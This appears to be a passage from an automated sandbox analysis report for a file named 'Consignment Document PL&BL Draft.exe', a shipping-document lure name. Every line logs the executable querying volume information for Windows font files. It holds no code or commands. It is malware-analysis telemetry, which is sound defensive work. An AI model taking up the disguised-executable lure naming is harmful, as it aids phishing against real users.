                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
